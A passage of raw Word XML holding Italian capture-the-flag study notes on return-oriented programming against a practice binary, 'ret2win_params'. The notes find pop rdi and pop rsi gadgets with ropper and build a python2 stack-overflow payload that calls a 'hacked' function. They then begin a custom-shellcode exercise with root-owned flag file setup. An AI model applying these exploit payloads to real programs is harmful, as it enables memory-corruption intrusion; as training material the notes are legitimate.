        <w:t>"\x42\x11\x40\x00\x00\x00\x00\x00"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F08725" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="6E7D7B38" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Come si vede abbiamo vari pop nell'offset e quindi dobbiamo trovare </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECF8F2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">un gadget che possa fare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> per passare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>deadbeef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44174171" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="4B366A9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ropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --file ret2win_params --search "pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4C55B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">&gt;&gt; 0x000000000040124b: pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>; ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933F001" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">prendiamo l'indirizzo e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>reversiamolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> per il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B15D4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="1AD14597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python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69676C4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"\x4b\x12\x40\x00\x00\x00\x00\x00" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FB2938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"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" +</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; param_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D25572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"\x42\x11\x40\x00\x00\x00\x00\x00"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--&gt; hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024C11E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D117968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ropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --file ret2win_params --search "pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B7EFF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">&gt;&gt; 0x0000000000401249: pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">; pop r15; ret;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3CBFD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">prendiamo l'indirizzo e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>reversiamolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> per il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E56A18" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>\x40\x12\x49\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43241BF8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Notiamo inoltre che non avviene solo una pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>, ma anche una pop r15,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51DFAB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>il nostro payload si modifica in quanto qualcosa andrà a finire dentro r15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE9682" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="37E0EEF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padding + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + param_1 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + param_2 + junk + hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B54D0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E31916B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python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA49841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"\x4b\x12\x40\x00\x00\x00\x00\x00" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B71BC0B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"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" +</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; param_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547E84F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">"\x40\x12\x49\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>---&gt; pop_rsi_r15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7F146" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\xc0\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\xc0" +</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>---&gt; param_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFC45A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"\x00\x00\x00\x00\x00\x00\x00\x00" +    ---&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>junk_param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="667C73D4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>"\x42\x11\x40\x00\x00\x00\x00\x00"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--&gt; hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7482A0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C42292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python2 -c 'print "A" * 24 + "\x4b\x12\x40\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F0AD6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ab/>
        <w:t>"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ef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ad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 xml:space="preserve">" + "\x49\x12\x40\x00\x00\x00\x00\x00" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF9EBD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ab/>
        <w:t>+ "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xb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a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xc0\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xbe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ba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\xc0" + "\x00\x00\x00\x00\x00\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579A12F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ "\x42\x11\x40\x00\x00\x00\x00\x00"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481024E0" w14:textId="77777777" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7401BE78" w14:textId="130F2BCD" w:rsidR="009D6CE9" w:rsidRPr="0070510D" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037C99A" w14:textId="24283A17" w:rsidR="0070510D" w:rsidRPr="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr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 xml:space="preserve">ret2win_params &lt; payload --&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0070510D" w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FATTO!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E079E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004214B5">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>05-injecting_custom_shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B6F6BC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FD307A" w14:textId="2C4E919E" w:rsidR="004214B5" w:rsidRPr="004214B5" w:rsidRDefault="004214B5" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004214B5">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=4zut2Mjgh5M</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13248F4C" w14:textId="60A2F77C" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="004214B5">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004214B5">
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004214B5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004214B5">
        <w:t>lart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004214B5">
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
        <w:t xml:space="preserve">in questo modo possiamo visionare anche tutti </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A19F7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">i permessi e le cartelle </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3243F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>In particolare, vediamo che flag.txt ha i seguenti permessi: -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>-------, ovvero solo il proprietario (root) ha il permesso di leggere e scrivere, mentre altri utenti non hanno alcun permesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2671F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="306AC8C2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> flag.txt --&gt; conferma il fatto che flag è protetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA492AC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="3EEEB3E1" w14:textId="59F2D73E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sudo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chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.txt --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667784B8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>utilizza sudo per elevare i privilegi e cambia l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> e il gruppo di flag.txt a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">. Questo è ridondante, poiché l'output del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>lart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> mostra che flag.txt era già di proprietà di root. Il comando non cambia i permessi del file, ma cambia il proprietario (proprietario e gruppo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B79B6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="28E9000E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> 600 flag.txt --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>permessi di tipo U-G-O (User, Group, Others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3D0C3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</w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> --&gt; 111 | 111 | 111 --&gt; 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C7ABE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se scrivo 600 corrisponde a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDA3D0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6 = 110 | 0 = 000 | 0 = 000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E245C5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 xml:space="preserve">quindi: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>-------  il</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> proprietario ha permesso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B5CEC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di leggere e scrivere, mentre tutti gli altri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748B915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utenti non hanno alcun permesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF10B1C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943F8A7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>chmod</w:t>
